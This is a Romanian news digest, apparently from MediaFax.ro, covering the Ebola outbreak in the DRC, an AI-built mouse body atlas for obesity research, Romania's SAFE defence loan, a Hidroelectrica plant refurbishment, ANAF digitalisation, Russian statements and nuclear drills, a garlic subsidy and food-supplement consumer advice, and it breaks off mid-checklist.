MediaFax.ro

Virusul a fost descoperit pentru prima dată în RDC în 1976. Rămâne o amenințare constantă, potrivit CNN.

Țara din Africa Centrală a înregistrat 17 focare. Este mai mult decât orice alt stat. Un focar grav, între 2018 și 2020, a provocat moartea a 2.299 de persoane.

Ebola este un virus adesea fatal. Provoacă simptome severe, inclusiv febră mare și hemoragii interne și externe. Își are originea în fauna sălbatică.

Virusul se transmite la oameni prin contact strâns cu sângele sau fluidele animalelor forestiere infectate. Este vorba despre „liliecii fructivori, porcii spinoși și primatele neumane”, inclusiv maimuțele, potrivit Organizației Mondiale a Sănătății (OMS).

Odată ce virusul pătrunde într-o comunitate, se răspândește rapid între oameni. Transmiterea are loc prin contact direct cu fluidele corporale sau cu suprafețe contaminate.

Oamenii de știință cred că primul contact uman cu Ebola a avut loc prin vânarea, manipularea sau consumul de animale sălbatice infectate. Acestea sunt cunoscute colectiv sub denumirea de „carne de vânat”.

Astfel de alimente rămân populare în RDC. Sunt incluse mai ales liliecii, maimuțele, antilopele și alte animale sălbatice. Acesta este unul dintre motivele pentru care Ebola rămâne un pericol și astăzi.

Zvonuri și ritualuri

Actualul focar de Ebola afectează în principal provincia Ituri din est. Aceasta se află la marginea nord-estică a Bazinului Congo. Potrivit OMS, majoritatea cazurilor sunt concentrate în capitala provinciei, Bunia, și în orașele miniere Mongwalu și Rwampara.

Primul caz suspect a implicat un lucrător din domeniul sănătății. Simptomele au apărut pe 24 aprilie. Pacientul a decedat ulterior într-o unitate medicală din Bunia, a raportat OMS.

Până pe 5 mai, organizația a fost notificată cu privire la o „boală neidentificată”. Aceasta era asociată cu rate ridicate de mortalitate în provincie.

După o anchetă realizată de o „echipă de intervenție rapidă” pe 13 mai, epidemia a fost identificată ca virus Bundibugyo pe 15 mai.

„În Mongwalu, oamenii spun că circulă un sicriu (fantomă) care provoacă moartea instantanee doar prin simpla privire.” A spus un martor. El a explicat că astfel de zvonuri determină unele persoane să respingă ajutorul medical. În schimb, acestea aleg rugăciunea, magia sau practicile tradiționale.

Baraka Nakashenyi, locuitor din Mongwalu, a confirmat că aceste practici rămân comune, în ciuda riscurilor.

„Atingerea (cadavrului) pentru ultima oară” este considerată „rămas-bunul final” pentru rudele îndoliate, a explicat Nakashenyi.

Mulți alții sunt acum „speriați să consume carne de vânat afumată, indiferent de originea acesteia”, a spus Junior Kambale Bawili, locuitor din Bunia. El a declarat pentru CNN că în trecut existau numeroase restaurante specializate în carne de vânat.

Un nou instrument al inteligenței artificiale îi ajută pe oamenii de știință să studieze obezitatea și modul în care afectează tot corpul, potrivit Euronews.

Acest „atlas corporal” dezvăluie daune extinse dincolo de țesutul adipos, obezitatea afectând corpul la nivel celular.

Studiul a fost publicat în revista „Nature”, la care au colaborat cercetători de la Helmholtz München, Universitatea Ludwig Maximilian din München și de la instituții colaboratoare.

MouseMapper permite studiul întregului corp în același timp

Modelul de IA utilizat, numit MouseMapper, a construit un „atlas” 3D detaliat al întregului corp. Acesta a identificat organe, nervi și celule imune în zeci de milioane de structuri simultan.

Până acum, oamenii de știință puteau studia doar modificările bolilor organ cu organ. Noul sistem permite o imagine completă a corpului într-o singură analiză.

Pentru dezvoltarea sistemului, cercetătorii au marcat nervii și celulele imune la șoareci folosind markeri fluorescenți. Ulterior, animalele au fost tratate cu tehnici de curățare a țesuturilor, care au făcut corpurile transparente optic. În același timp, au fost păstrate aceste semnale fluorescente, mai arată sursa.

IA a cartografiat 31 de tipuri de organe și țesuturi

Microscopia specială cu folie de lumină a produs scanări 3D de înaltă rezoluție ale corpurilor. Apoi, inteligența artificială a analizat automat imaginile și a cartografiat 31 de tipuri de organe și țesuturi.

Astfel, cercetătorii au putut vedea unde apar simultan inflamația și leziunile structurale în tot corpul.

Oamenii de știință au testat sistemul pe șoareci hrăniți cu o dietă bogată în grăsimi. Animalele au dezvoltat obezitate și modificări metabolice similare cu cele ale oamenilor. Rezultatele au arătat inflamații pe scară largă și modificări ale țesutului în mai multe organe, inclusiv grăsime, ficat și mușchi.

Descoperiri fascinante la nivelul sistemului nervos

Cercetătorii au descoperit modificări structurale majore la nivelul nervului trigemen, care controlează senzația facială. La șoarecii obezi, nervul avea mai puține ramificații și terminații. În acest mod, s-a sugerat o pierdere a funcției senzoriale normale. Testele comportamentale au confirmat că șoarecii au răspuns mai puțin la atingere și stimulare.

Oamenii de știință au analizat apoi mostre de țesut uman de la persoane cu obezitate. Ei au descoperit modificări moleculare similare în ganglionul trigemen, centrul nervos legat de senzația facială. Descoperirile sugerează că leziunile nervoase legate de obezitate observate la șoareci pot apărea și la oameni.

„Gemenii digitali”, un viitor instrument de simulare a progresiei bolilor

Platforma ar putea transforma modul în care sunt studiate bolile complexe, susțin oamenii de știință. Cu ajutorul IA, pot examina acum modul în care bolile afectează întregul corp și nu doar să analizeze un organ pe rând.

Cercetătorii își doresc să construiască în viitor „gemeni digitali” ai unor organisme. Aceștia le-ar permite să simuleze progresia bolilor și să testeze tratamente înainte de a trece la experimente fizice. Construcția lor ar putea accelera descoperirea medicamentelor și ar reduce nevoia de experimente pe animale, mai precizează sursa.

România va avea acces, prin acest acord, la o finanțare europeană de 16,68 miliarde euro, a doua cea mai mare alocare din Uniunea Europeană în cadrul instrumentului SAFE, după Polonia, programul fiind destinat investițiilor majore în apărare, infrastructură strategică și consolidarea industriei europene de apărare, a transmis, joi, Ministerul Finanțelor Publice.

• Potrivit cadrului general stabilit, finanțarea prin credite, cu o dobândă foarte mică, de 3%, va fi folosită pentru înzestrarea modernă a Armatei Române şi a infrastructurii asociate – 9,53 miliarde euro, pentru infrastructură duală gestionată de Ministerul Transporturilor și Infrastructurii, respectiv capetele din Autostrada Moldovei Pașcani-Ungheni și Pașcani-Siret,  4,2 miliarde euro și pentru Ministerul Afacerilor Interne și celelalte forțe din sistemul de apărare națională, 2,8 miliarde euro.
• Per ansamblu, sunt 21 de proiecte care au legătură cu Ministerul Apărării Naționale, care totalizează 9,53 miliarde de euro, iar zece dintre ele sunt cu achiziții în comun cu alte state, iar 11 sunt cu achiziții individuale ale statului român.
• Mihai Jurca, șef al Cancelariei Prim-ministrului, a anunțat pe 24 aprilie că România a primit din partea Comisiei Europene contractul-cadru pentru finanțarea prin programul SAFE, în valoare de aproximativ 16,6 miliarde de euro, a doua cea mai mare alocare din UE.
• Pe 28 aprilie, Comisiile de Apărare din cele două camere ale parlamentului au dat aviz favorabil programului SAFE.
• Acordul de împrumut cu Comisia Europeană în cadrul instrumentului SAFE a fost aprobat de Guvern, marțea, trecută, prin memorandum. România va putea accesa 16,68 miliarde de euro pentru investiții în apărare, bani care vor fi acordați în tranșe, în funcție de îndeplinirea unor obiective asumate.

Potrivit Ministerului Finanțelor, instrumentul SAFE permite statelor membre să acceseze împrumuturi europene în condiții avantajoase, pentru investiții urgente în securitate și apărare.

Pentru România, finanțarea acoperă proiecte de înzestrare, tehnologie militară, infrastructură asociată și proiecte de transport cu relevanță strategică. Potrivit planului transmis Comisiei Europene, alocarea include aproximativ 4,2 miliarde euro pentru infrastructura de transport rutier de interes național, diferența fiind destinată proiectelor de înzestrare și infrastructură din zona de apărare și securitate.

„Semnarea acordului de către Comisia Europeană confirmă că România a parcurs la timp etapele necesare pentru accesarea uneia dintre cele mai importante finanțări europene dedicate securității. Vorbim despre 16,68 miliarde euro care pot susține apărarea, infrastructura strategică, industria națională de profil și locuri de muncă în sectoare cu valoare adăugată ridicată”, a declarat ministrul Finanțelor, Alexandru Nazare.

Potrivit demnitarului, SAFE înseamnă securitate pentru România, dar și una dintre cele mai importante șanse de dezvoltare pentru Moldova din ultimele decenii.

„Ministerul Finanțelor a tratat acest dosar ca pe o prioritate, pentru că SAFE nu este doar un instrument financiar, ci o investiție în securitatea și reziliența României. Prin SAFE, România nu investește doar în apărare și securitate, ci creează poate cea mai importantă oportunitate din ultimele decenii pentru conectarea Moldovei la infrastructura mare europeană. În aceste luni au fost create mecanisme concrete prin care proiectele strategice din regiune — Pașcani–Suceava–Siret, Târgu Neamț–Iași–Ungheni și alte investiții esențiale pentru Moldova — vor avea o evidență distinctă și predictibilă a finanțării până în 2031. SAFE înseamnă securitate pentru România, dar și una dintre cele mai importante șanse de dezvoltare pentru Moldova din ultimele decenii. Am creat inclusiv un mecanism distinct de evidență a proiectelor finanțate, în bugetele ordonatorilor de credite care vor gestiona investițiile din acest program, pentru ca cetățenii să poată vedea transparent, până în 2031, cât se investește anual în autostrăzile și infrastructura care pot schimba fundamental conectivitatea și dezvoltarea economică a regiunii”, a completat Alexandru Nazare.

Cronologia programului

România a semnat acordul la data de 12 mai 2026, în baza aprobării Memorandumului de către Guvern și de către Președintele României. Documentele originale semnate au fost transmise cu celeritate Comisiei Europene și au ajuns la Bruxelles pe 13 mai 2026.

Potrivit sursei citate, acordul stabilește condițiile de acordare a împrumutului, perioada de disponibilitate și mecanismul prin care România va putea transmite cereri de plată. Prima tragere poate fi solicitată în octombrie 2026, iar perioada de disponibilitate a împrumutului este până la 31 decembrie 2030.

După intrarea în vigoare a acordului, Comisia Europeană va putea acorda României o prefinanțare de 15% din împrumut, respectiv aproximativ 2,5 miliarde euro. Fiecare tranșă, inclusiv prefinanțarea, va avea o maturitate de 45 de ani, cu o perioadă de grație de 10 ani.

Ministerul Finanțelor va gestiona fondurile acordate României prin SAFE, Cancelaria Prim-Ministrului va asigura supervizarea generală a Planului,  iar instituțiile beneficiare — Ministerul Apărării Naționale, Ministerul Afacerilor Interne, Serviciul Român de Informații, Serviciul de Telecomunicații Speciale, Serviciul de Informații Externe, Serviciul de Protecție și Pază, Ministerul Transporturilor și Infrastructurii și Administrația Națională a Penitenciarelor — vor implementa proiectele și achizițiile asumate prin Planul de investiții al României.

„SAFE este un instrument european temporar, creat pentru a sprijini statele membre în realizarea unor investiții urgente și majore în apărare, în contextul deteriorării mediului de securitate european. Pentru România, finanțarea reprezintă atât un instrument de securitate, cât și o oportunitate economică: investiții în industrie, infrastructură, tehnologie și capacități strategice”, au conchis oficialii MFP.

Centrala de la Râul Mare-Retezat va intra în retehnologizare și, după cinci ani, conform duratei contractului, va livra în Sistemul Energetic Național încă aproximativ 135 MW stabili, în bandă, indiferent de condițiile meteorologice.

Câștigătorul contractului, cel mai mare din ultimii 15 ani, a fost selectat pe 28 aprilie, în urma unei proceduri inițiate în luna septembrie a anului trecut, potrivit datelor afișate pe platforma Sistemului Electronic de Achiziții Publice (SEAP).

În urma procesului de evaluare, contractul a fost atribuit asocierii formate din Andritz Hydro GmbH (asociat) și COBRA INSTALACIONES Y SERVICIOS S.A. (lider de asociere), împreună cu subcontractanții LAS PROM S.R.L., GD Mașini de Ridicat, Compania de Consultanță în Energie și Mediu S.A., Electric Total S.R.L., ARIS Engineering S.R.L. și Electromontaj Carpați S.A.

Contractul de retehnologizare a Centralei Hidroelectrice Râul Mare Retezat, un proiect strategic pentru modernizarea și eficientizarea capacităților de producție ale companiei, în valoare de 188.496.099,76 euro, fără TVA, aceasta fiind mai mică decât cea estimată inițial, de 193.347.753 euro, fără TVA.

„Vom avea și deblocare a celor megawați atât de necesari pentru echilibrarea Sistemului Energetic Național”

Centrala de la Râul Mare-Retezat este una dintre centralele emblematice pe care Hidroelectrica le are în portofoliu, a subliniat Bogdan Badea, președintele Directoratului Hidroelectrica, în cadrul evenimentului pentru semnarea acestui contract considerat extrem de important din viața companiei, dar și pentru Sistemul Energetic Național.

„Astăzi dăm drumul la retehnologizarea centralei de la Râul Mare Retezat. „Este a doua cea mai mare centrală de pe râurile interioare pe care o avem în portofoliu, după Lotru-Ciunget. Este o centrală care ar fi trebuit să funcționeze la o putere de aproape 340 de megawați, cu două grupuri și care, din păcate, datorită unor erori de proiectare făcute la final de anii 80, atunci când centrala a fost pusă în funcțiune – centrala a fost pusă în funcțiune în 1086 și iată, în 2026, cifră rotundă, semnăm contractul de retehnologizare – centrala funcționează cu restricții și cred că această retehnologizare, pe lângă adăugarea unui nou ciclu de viață acestei centrale, vom avea și deblocare a celor megawați atât de necesari pentru echilibrarea Sistemului Energetic național”, a explicat Bogdan Badea, președintele Directoratului Hidroelectrica.

„S-a vorbit foarte mult despre stocare în această perioadă și cred că centrala de la Râul Mare – Retezat, lacul de acumulare de acolo vor contribui cu succes la echilibrarea sistemului, la creșterea capacității de stocare. Și este ceea ce Hidroelectrica face cel mai bine: echilibrează sistemul energetic național, acoperă vârfurile de consum și contribuie la tranziția energetică către un sistem mai verde și mai sustenabil. Vreau să le mulțumesc pentru prezență câștigătorilor licitației de retehnologizare de la Râul Mare-Retezat, este cea mai mare valoare pe care o semnăm pe un contract de retehnologizare astăzi, după centrala de la Vidraru și vreau să le urez succes”, a declarat Bogdan Badea.

Potrivit oficialilor companiei, investiția urmărește pregătirea centralei pentru un nou ciclu de viață operațională, prin înlocuirea principalelor echipamente electromecanice și implementarea unor soluții tehnologice moderne. Proiectul include instalarea unor turbine Francis verticale noi, modernizarea generatoarelor, a sistemelor de excitație și automatizare, integrarea completă în sistemele SCADA și reabilitarea infrastructurii electrice și constructive aferente. Totodată, vor fi implementate sisteme moderne de securitate, monitorizare și protecție la incendiu, a transmis compania.

Prin retehnologizare se urmărește creșterea eficienței energetice, îmbunătățirea fiabilității și disponibilității instalațiilor, reducerea costurilor de exploatare și menținerea rolului strategic al centralei în SEN. Noile echipamente vor permite funcționarea în condiții de siguranță și performanță, conform standardelor tehnologice actuale și cerințelor de flexibilitate ale pieței de energie.

„Va fi una dintre cele mai profitabile centrale”

La întrebarea Mediafax, Bogdan Badea a declarat că, la finalul retehnologizării, centrala de la Râul Mare Retezat va fi una dintre cele mai profitabile centrale.

„Legat de profitabilitate, nu putem face o estimare, depinde de prețul energiei la acel moment, dar cu siguranță centrala de la Râu Mare-Retezat, fiind o centrală de sistem, centrală care este construită să acopere vârfurile de consum și să asigure necesarul de stabilitate și echilibrare a sistemului energetic național atunci când este nevoie, va fi una dintre cele mai profitabile centrale. Vă spuneam că este a doua cea mai mare centrală de pe râurile interioare, după Lotru-Ciunget, o altă centrală emblematică, o altă retehnologizare de succes făcută acum ceva ani de zile, care funcționează impecabil”, a declarat președintele Directoratului Hidroelectrica.

„Vrem ca și centrala de la Râul Mare-Retezat să fie în poziția pe care o merită. Spuneam că primul mare pas pe care ar trebui să-l facem pentru a confirma parametrii de funcționare centrale a fost să umple lacul de la Râu Mare-Retezat în anul 2021, pentru că el nu era umplut de la punerea în funcțiune datorită unor discuții tehnice. Atunci s-a luat o decizie curajoasă de a face umplere controlată, sigur, sub supraveghere, ca să fim siguri că volumul din spatele barajului, volumul de apă, poate fi utilizat și acolo discutăm de producții semnificative de energie atunci când sistemul o cere, este utilizată în totalitate și parametrii de intrare pentru această retehnologizare au fost confirmați cu acest prilej. Cu siguranță va fi o centrală profitabilă”, a detaliat Bogdan Badea.

Complexul proiectul va implica atât forță de muncă locală, dar și expertiză externă.

„Din punct de vedere al forței de muncă locale, sigur că discutam cu partenerii noștri înainte de semnarea acestui contract despre faptul că în cadrul consorțiului au angrenat și forță de muncă locală. Nu vorbim de, să spunem, de o logistică simplă, vorbim de o logistică extrem de complicată, vorbim de hidroagregate mari, vorbim de multe domenii de competență – mecanic, electric, construcții. Este un proiect extrem de complex, care cu siguranță va angrena multă forță de muncă locală, va angrena know-how și expertiză de la partenerii noștri astfel încât să avem cele mai bune rezultate din punct de vedere al eficienței operaționale, din punct de vedere al consumului de apă, că ați văzut că în România apa e foarte scumpă, din ce în ce mai scumpă, astfel încât pentru Hidroelectrica, pentru acționari săi și pentru Sistemul Energetic Național să dăm ceea ce este mai bun”, a declarat Bogdan Badea.

Profit în creștere cu 122% după primul trimestru

Compania a raportat după primele trei luni ale anului un profit net care a urcat cu 122% față de primul trimestru din 2025, la 1.307 milioane de lei, de la 589 milioane de lei, conform rezultatelor financiare transmise joi seara la Bursa de Valori București (BVB).

În ceea ce privește investițiile, Hidroelectrica a realizat în 2025 investiții de aproximativ 781 milioane lei, cel mai ridicat nivel investițional din istoria recentă a companie, iar pentru 2026, societatea anunța că își propune continuarea unui program ambițios de investiții, cu accent pe proiecte de stocare, modernizarea activelor existente și dezvoltarea unor noi capacități regenerabile.

Hidroelectrica este o companie controlată de stat, prin Ministerul Energiei, care deține 80,05% din acțiuni. De la listarea din iulie 2023, Hidroelectrica și-a consolidat poziția de cel mai mare producător de energie electrică din România, 100% energie verde, cu o cotă de aproximativ 27% din producția națională în ultimii cinci ani. Totodată, compania a devenit cel mai mare furnizor de electricitate din România pe piața concurențială, administrând un portofoliu de peste 1,3 milioane de locuri de consum. Compania operează 188 de hidrocentrale cu o putere instalată de peste 6,3 GW. De asemenea, compania deține și parcul eolian Crucea Wind Farm, cu o capacitate instalată de 108 MW.

ANAF pregătește un proiect pilot de digitalizare care ar permite depunerea de cereri, solicitarea de documente și obținerea de informații fără contact direct cu funcționarii. Sistemul ar urma să fie testat inițial la administrația fiscală din București și să reducă timpul petrecut la ghișee și interacțiunea directă cu funcționarii.

„ANAF trebuie să intre în secolul acesta”

Potrivit informațiilor publicate de Economedia, Ministerul Finanțelor și ANAF lucrează la un sistem de terminale interactive prin care contribuabilii să poată depune cereri, solicita documente sau primi informații fără să mai discute direct cu angajații Fiscului.

„ANAF trebuie să intre în secolul acesta”, au declarat surse apropiate proiectului pentru publicația economică.

Chatbot-ul „ANA” la ghișeele ANAF

Sistemul este gândit în special pentru persoane fizice și ar trebui să funcționeze printr-o interfață digitală asistată de chatbot-ul „ANA”, asistentul virtual al ANAF folosit pentru întrebări și informații fiscale. Contribuabilii vor utiliza un panou interactiv similar sistemelor de comandă din aeroporturi sau restaurante de tip fast-food.

Terminalele vor permite identificarea contribuabilului, selectarea serviciului dorit și transmiterea automată a solicitărilor către administrația fiscală.

Serviciile nu vor putea fi accesate încă de acasă

Proiectul se află încă în fază pilot și, potrivit specialiștilor, nu ar putea fi extins imediat pentru utilizare integrală de acasă, din cauza problemelor legate de infrastructura IT și securitatea cibernetică.

Inițiativa face parte din digitalizarea pregătită de ANAF și Ministerul Finanțelor, care include modernizarea Spațiului Privat Virtual (SPV), refacerea infrastructurii IT și automatizarea relației cu contribuabilii.

Noul portal ANAF, lansat din vară

Recent, ministrul interimar al Finanțelor, Alexandru Nazare, a anunțat că noul portal ANAF și o versiune extinsă a SPV ar urma să fie lansate încă din această vară. Sistemul va include formulare inteligente și parțial precompletate, programări online, videoconferințe și o comunicare digitală rapidă cu contribuabilii, spune ministrul.

Potrivit acestuia, digitalizarea ANAF reprezintă unul dintre cele mai ample procese de modernizare administrativă din România, iar la noile sisteme informatice lucrează peste 2.500 de angajați ai Ministerului Finanțelor, ANAF și Centrului Național pentru Informații Financiare.

„Rușii sunt pregătiți pentru discuții”, a spus purtătorul de cuvânt al Kremlinului, Dmitri Peskov, conform dpa.

„Credem că este întotdeauna mai bine să discutăm unii cu alții decât să împingem situația spre o confruntare totală, exact ceea ce fac europenii în prezent”, a spus el.

Peskov a adăugat că Rusia ar saluta o schimbare de ton.

El a făcut trimitere la declarații recente ale președintelui finlandez Alexander Stubb și la semnale venite de la Berlin privind discuții directe cu Rusia și a spus că „probabil nu ar fi un lucru rău” dacă la nivelul UE ar fi căutat un negociator.

„Cu doar câteva luni în urmă, astfel de discuții nici măcar nu aveau loc în Europa”, a remarcat Peskov.

Și Putin a spus că este pregătit pentru discuții dacă i se solicită acest lucru.

În același timp, Moscova a transmis în repetate rânduri, inclusiv prin Ministerul de Externe, că europenii ar trebui considerați parte a războiului, având în vedere livrările de arme către Ucraina, și că, prin urmare, nu au loc la masa negocierilor.

Negocierile pentru încheierea războiului Rusiei împotriva Ucrainei au fost purtate în ultima perioadă sub mediere americană. Până acum, însă, discuțiile dintre Kiev și Moscova nu au dus la un progres decisiv.

Principalul motiv este că Rusia își menține cererea ca Ucraina să își retragă trupele din regiunea Donbas. Președintele ucrainean Volodimir Zelenski a respins astfel de concesii teritoriale în favoarea lui Putin.

ISU Bistrița-Năsăud a anunțat că pompierii au fost sesizați joi după-amiază despre faptul că o persoană a fost atacată de un urs.

Bărbatul ar fi fost atacat în afara localității Bichigiu, într-o zonă greu accesibilă, aflată la aproximativ 1,5 km de cea mai apropiată cale de acces.

Conform pompierilor, victima este conștientă și cooperantă, dar cu leziuni la un picior.

La fața locului se deplasează un echipaj de prim ajutor SMURD, echipajul de terapie intensivă mobilă SMURD și jandarmi.

Intervenția este în desfășurare.

În timp ce unii turiști se bucură să descopere locuri secrete, alții se feresc de ele, îngrijorați de ceea ce ar putea găsi.

Cu toate acestea, un călător îi încurajează pe oameni să-și depășească temerile și să exploreze o plajă ascunsă uimitoare din sudul Devonului, potrivit Express.

Pentru a ajunge la plaja Ness Cove din Shaldon, vizitatorii trebuie mai întâi să traverseze istoricul Tunel al Contrabandiștilor – un pasaj îngust, cu poteci în pantă și trepte care coboară spre coastă.

Intrarea ciudată și oarecum intimidantă a stârnit o curiozitate considerabilă online după ce un cont de TikTok a postat imagini care dezvăluie exact ce se află în interiorul tunelului.

În ciuda accesului destul de înfiorător, vizitatorii insistă că plaja care îi așteaptă la capătul tunelului este absolut magnifică.

O declarație spune: „Amplasată în mijlocul stâncilor adăpostitoare, Ness Cove se remarcă ca una dintre cele mai izolate și pitorești plaje ale noastre”.

Accesul la plajă prin tunelul original al contrabandiștilor face parte din ceea ce face destinația atât de de neuitat pentru cei care se aventurează acolo.

Plaja în sine este formată în principal din pietriș, înclinându-se treptat spre apă, ceea ce o face un loc preferat pentru înot în lunile mai calde.

Cu toate acestea, numeroși vizitatori susțin că adevărata atracție constă în sentimentul de izolare și liniște oferit de stâncile impunătoare care înconjoară golful.

Vladimir Putin, a declarat joi că exercițiile nucleare comune desfășurate împreună cu Belarus vor implica lansări de rachete balistice și rachete de croazieră, scrie Baha.

Declarațiile au fost făcute în timp ce Putin a urmărit testele nucleare prin legătură video, alături de omologul său din Belarus, Aleksandr Lukașenko.

Liderul rus a reiterat anterior că așa-numita „triadă nucleară” a Rusiei trebuie să funcționeze ca o garanție a suveranității Rusiei și a Belarusului.

Anunțul vine pe fondul tensiunilor tot mai mari dintre Rusia și mai multe state europene, în special țările baltice, în contextul în care războiul din Ucraina continuă.

Exercițiile sunt prezentate de Moscova ca parte a pregătirii strategice a forțelor nucleare, într-o perioadă de confruntare geopolitică intensă.

Programul de sprijin pentru cultivatorii de usturoi a fost aprobat în ședința de Guvern din 21 mai 2026, autoritățile reluând astfel schema de ajutor de minimis destinată acestui sector agricol. Măsura vine în contextul unui deficit comercial pe această cultură și are ca obiectiv creșterea suprafețelor cultivate, dar și stimularea producției interne, potrivit MADR.

Bugetul total alocat schemei este de 60.000.000 de lei, iar plățile către beneficiari vor fi efectuate până cel târziu la data de 22 decembrie 2026. Autoritățile susțin că programul urmărește nu doar creșterea producției de usturoi, ci și menținerea fermierilor în activitate, în special în zonele cu tradiție, unde această cultură are un rol economic important.

Un sector agricol cu balanță comercială negativă

„Reluăm sprijinul pentru producătorii de usturoi, un sector agricol cu balanță comercială negativă. Prin programul adoptat astăzi urmărim creșterea suprafețelor cultivate cu usturoi și, implicit, a producției, precum și încurajarea fermierilor să continue această activitate agricolă în zonele cu tradiție”, a declarat viceprim-ministrul și ministrul interimar al agriculturii, Tánczos Barna. Acesta a subliniat și necesitatea unui tratament echitabil pentru alte sectoare afectate, precum cel al cartofului, care nu a beneficiat de sprijin în anul anterior, în ciuda dificultăților generate de importuri și de scăderea prețurilor.

Conform schemei aprobate, sprijinul financiar este de 3.000 de euro pe hectar și se acordă pentru suprafețe cuprinse între minimum 3.000 de metri pătrați și maximum 6 hectare pentru fiecare beneficiar. De asemenea, fermierii trebuie să obțină o producție de cel puțin 3,5 tone la hectar pentru a putea primi ajutorul.

Cine beneficiază de ajutoare

Cererile de înscriere în program trebuie depuse în termen de 10 zile de la intrarea în vigoare a hotărârii de Guvern. Pot beneficia de acest sprijin producătorii agricoli persoane fizice, persoanele fizice autorizate (PFA), întreprinderile individuale și familiale, precum și persoanele juridice.

Verificările vor fi realizate în teren de echipe mixte formate din reprezentanți ai Direcțiilor Agricole Județene și ai Agenției de Plăți și Intervenție pentru Agricultură. Acestea vor urmări identificarea suprafețelor cultivate, existența culturilor înainte de recoltare și densitatea plantelor.

Recoltarea și valorificarea producției trebuie realizate după efectuarea controalelor în teren și până cel târziu la data de 23 noiembrie 2026. Documentele justificative privind valorificarea producției pot fi depuse până la data de 24 noiembrie 2026.

Autoritățile consideră că sprijinul acordat prin această schemă poate contribui la echilibrarea veniturilor și cheltuielilor producătorilor agricoli, la creșterea nivelului de trai în mediul rural, precum și la prevenirea depopulării, prin menținerea locurilor de muncă și atragerea tinerilor în agricultură.

PRISA subliniază că suplimentele alimentare notificate legal sunt produse reglementate la nivel european și sunt definite de Comisia Europeană ca surse concentrate de nutrienți sau alte substanțe cu efect nutrițional ori fiziologic, comercializate în forme dozate precum capsule, comprimate, tablete, pulberi sau lichide în doze măsurate. Acestea sunt destinate completării alimentației normale și nu pot fi promovate ca tratamente sau vindecări pentru boli.

Rolul suplimentelor și limitele lor în comunicarea către consumatori

PRISA arată că, atunci când sunt alese informat și utilizate responsabil, suplimentele alimentare pot susține un stil de viață echilibrat prin aport de vitamine, minerale, probiotice, acizi grași, extracte vegetale sau alte ingrediente cu rol în funcționarea normală a organismului. Totuși, mențiunile de sănătate utilizate în promovare trebuie să respecte registrul european al mențiunilor nutriționale și de sănătate și nu trebuie să inducă ideea că aceste produse tratează sau vindecă boli.

În România, suplimentele alimentare pot fi introduse pe piață doar pe baza unui certificat de notificare emis de Ministerul Sănătății și trebuie comercializate exclusiv sub formă preambalată. În același timp, industria subliniază că aceste produse nu sunt medicamente, nu înlocuiesc tratamentele medicale și nu pot fi prezentate ca alternativă la medicația recomandată de specialiști.

Poziția PRISA: toleranță zero față de fraude și reclame înșelătoare

„Cazurile de fraudă nu trebuie să arunce o umbră asupra întregii industrii a suplimentelor alimentare. Dimpotrivă, ele arată cât de important este ca autoritățile să intervină ferm împotriva rețelelor ilegale, iar consumatorii să aleagă doar produse notificate, comercializate prin surse de încredere și promovate responsabil. PRISA susține toleranță zero față de practicile neloiale, reclamele mincinoase și folosirea abuzivă a imaginii medicilor, vedetelor sau instituțiilor publice”, a declarat Gerald Flintoacă-Filip, secretar general PRISA.

Organizația avertizează că mediul online este zona în care apar frecvent forme de dezinformare, inclusiv site-uri fără date de identificare, bloguri obscure, pagini de vânzare temporare, conturi false în social media, reclame agresive și testimoniale fabricate.

Cereri către autorități: controale mai stricte în mediul online

PRISA solicită intensificarea controalelor și a monitorizării în mediul digital, unde astfel de practici sunt în creștere. Organizația cere implicarea coordonată a instituțiilor precum Ministerul Sănătății, ANPC, ANSVSA/DSVSA, ANAF, autoritățile din domeniul comunicațiilor digitale și organele de cercetare penală, acolo unde există indicii de fraudă.

Totodată, PRISA își exprimă disponibilitatea de colaborare cu autoritățile și susține utilizarea mecanismelor europene de alertă, control și schimb de informații, având în vedere caracterul transfrontalier al multor rețele ilegale.

Scopul acestor măsuri este identificarea rapidă a fraudelor, blocarea platformelor neconforme și protejarea consumatorilor din România și Uniunea Europeană.

Cum se pot proteja consumatorii: reguli simple pentru alegerea suplimentelor

PRISA recomandă consumatorilor să cumpere suplimente alimentare doar din surse sigure și să evite produsele promovate prin promisiuni de vindecare rapidă, rezultate garantate sau înlocuirea tratamentelor medicale.

O sursă considerată sigură este un comerciant identificabil, care oferă produse notificate legal și informații complete despre acestea. În practică, sunt recomandate farmaciile, drogheriile, site-urile producătorilor sau distribuitorilor cunoscuți și marketplace-urile unde vânzătorii sunt clar identificați.

Un site de încredere trebuie să afișeze în mod vizibil numele companiei, CUI-ul, sediul, datele de contact, politica de retur și informații complete despre produs. Lipsa acestor elemente este un semnal de alarmă.

Consumatorii pot verifica produsele în registrele publice ale Ministerului Sănătății, inclusiv Registrul vitaminelor și suplimentelor, precum și în listele publicate de Institutul Național de Cercetare-Dezvoltare pentru Bioresurse Alimentare (IBA București), în cazul produselor pe bază de plante.

Unde pot fi raportate produsele suspecte

PRISA încurajează raportarea oricăror produse suspecte sau reclame înșelătoare către autoritățile competente, în funcție de situație: ANPC, Ministerul Sănătății, ANSVSA, ANAF sau ANCOM.

Sesizările pot viza site-uri fără date clare, produse care promit vindecări, reclame agresive sau lipsa informațiilor despre notificarea legală. Scopul este reducerea fraudelor și creșterea protecției consumatorilor pe piața suplimentelor alimentare.

5 pași simpli pentru alegerea unui supliment alimentar de încredere 1. Căutați numărul de notificare al produsului

Un supliment alimentar comercializat legal în România trebuie să fie notificat. Verificați dacă numărul de notificare apare pe etichetă sau pe ambalaj. Dacă produsul este cumpărat online, verificați dacă acest număr este afișat și pe pagina produsului.

2. Verificați ca eticheta să fie în limba română

Eticheta unui supliment alimentar comercializat în România trebuie să fie în limba română și să includă mențiunea „supliment alimentar”, lista ingredientelor, modul de administrare, porția zilnică recomandată, avertismentele, termenul de valabilitate, lotul și datele producătorului, importatorului sau distribuitorului. O etichetă lipsă, incompletă, netradusă în limba română sau tradusă neclar este un semnal de alarmă.

3. Verificați cine este comerciantul

Cumpărați doar de pe site-uri care afișează clar numele companiei, CUI-ul, sediul, datele de contact și condițiile de retur. Evitați paginile unde nu este clar cine vinde produsul sau cum poate fi contactat comerciantul. Un comerciant de încredere este transparent și ușor de identificat și contactat.

4. Evitați promisiunile miraculoase

Formulări precum „vindecă”, „tratează”, „elimină boala”, „înlocuiește tratamentul prescris de medic”, „produs-minune”, „rezultat garantat” sau „fără niciun efect secundar” indică o comunicare înșelătoare.

5. Verificați reclamele care folosesc vedete, medici sau „specialiști”.

